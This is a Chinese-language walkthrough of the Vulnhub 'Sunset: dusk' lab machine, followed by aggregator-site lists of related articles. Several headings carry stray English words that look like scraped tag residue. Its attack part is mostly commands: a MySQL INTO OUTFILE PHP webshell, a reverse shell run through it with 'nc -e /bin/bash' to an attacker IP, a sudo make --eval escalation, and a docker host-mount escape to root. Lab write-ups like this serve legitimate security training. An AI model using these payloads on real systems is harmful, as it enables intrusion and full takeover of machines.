Sunset: dusk: Vulnhub Walkthrough
靶機連接:php
https://www.vulnhub.com/entry/sunset-dusk,404/mysql
主機IP掃描:sql
IP端口掃描:docker
21 端口 pyftpdlib 1.5.5 版本漏洞shell
25 端口 Postfix 帳戶枚舉bash
80 Apache httpd 2.4.38 版本漏洞,目錄枚舉3d
3306 mysql MySQL 5.5.5-10.3.18-MariaDB-0+deb10u1 版本漏洞,暴力破解server
8080 http PHP cli server 5.5 版本漏洞,目錄枚舉blog
80 HTTP目錄枚舉,無結果cmd
MySQL爆破結果
嘗試用MySQL into outfile 寫一句話木馬
select "<?php system($_GET['cmd']); ?>" into outfile '/var/tmp/pentest.php';
反向shell
http://10.10.203.20:8080/pentest.php?cmd=nc%20-e%20/bin/bash%2010.10.203.14%201234
提權操做
COMMAND='/bin/sh'
sudo -u dusk make -s --eval=$'x:\n\t-'"$COMMAND"
docker run -v /:/hostOS -i -t chrisfosterelli/rootplease
OVER!!
相關文章
- 1. Sunset-Sunrise: Vulnhub Walkthrough
- 2. Sunset: Nightfall Vulnhub Walkthrough
- 3. Sunset: Vulnhub Walkthrough
- 4. Vulnhub sunset系列--nightfall
- 5. HA: Dhanush Vulnhub Walkthrough
- 6. HA: Chakravyuh Vulnhub Walkthrough
- 7. Girlfreind:1 Vulnhub Walkthrough
- 8. Happycorp:1 Vulnhub Walkthrough
- 9. HA: Chanakya Vulnhub Walkthrough
- 10. HA Joker Vulnhub Walkthrough
- 更多相關文章...
- • PHP date_sunset() 函數 - PHP參考手冊
相關標籤/搜索
每日一句
-
每一个你不满意的现在,都有一个你没有努力的曾经。
最新文章
- 1. Duang!超快Wi-Fi來襲
- 2. 機器學習-補充03 神經網絡之**函數(Activation Function)
- 3. git上開源maven項目部署 多module maven項目(多module maven+redis+tomcat+mysql)後臺部署流程學習記錄
- 4. ecliple-tomcat部署maven項目方式之一
- 5. eclipse新導入的項目經常可以看到「XX cannot be resolved to a type」的報錯信息
- 6. Spark RDD的依賴於DAG的工作原理
- 7. VMware安裝CentOS-8教程詳解
- 8. YDOOK:Java 項目 Spring 項目導入基本四大 jar 包 導入依賴,怎樣在 IDEA 的項目結構中導入 jar 包 導入依賴
- 9. 簡單方法使得putty(windows10上)可以免密登錄樹莓派
- 10. idea怎麼用本地maven
歡迎關注本站公眾號,獲取更多信息
相關文章
- 1. Sunset-Sunrise: Vulnhub Walkthrough
- 2. Sunset: Nightfall Vulnhub Walkthrough
- 3. Sunset: Vulnhub Walkthrough
- 4. Vulnhub sunset系列--nightfall
- 5. HA: Dhanush Vulnhub Walkthrough
- 6. HA: Chakravyuh Vulnhub Walkthrough
- 7. Girlfreind:1 Vulnhub Walkthrough
- 8. Happycorp:1 Vulnhub Walkthrough
- 9. HA: Chanakya Vulnhub Walkthrough
- 10. HA Joker Vulnhub Walkthrough